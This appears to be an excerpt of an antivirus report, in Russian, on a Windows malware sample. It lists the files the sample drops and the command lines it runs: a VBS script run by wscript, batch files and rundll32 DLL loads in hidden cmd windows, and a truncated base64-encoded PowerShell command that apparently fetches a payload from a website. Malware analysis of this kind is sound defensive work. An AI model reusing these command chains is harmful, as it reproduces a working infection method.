Техническая информация
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\tghklsd.vbs
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1472
- %TEMP%\error013600_01.xml
- %ALLUSERSPROFILE%\tghklsd.vbs
- %ALLUSERSPROFILE%\jledshf.bat
- %TEMP%\1098574.cvr
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\jledshf.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\rundll32.exe %ALLUSERSPROFILE%\vbkwk.dll,dfsgeresd' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\jledshf.bat" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnAD0AIgBoAHQAdABwADoALwAvAHMAdQBtAGUAZABoAGEAbwBuAGwAaQBuAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBIAHkAegBOAFgASgAzADAAWABPAFEAVgBj...
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\rundll32.exe %ALLUSERSPROFILE%\vbkwk.dll,dfsgeresd
- '%WINDIR%\syswow64\rundll32.exe' %ALLUSERSPROFILE%\vbkwk.dll,dfsgeresd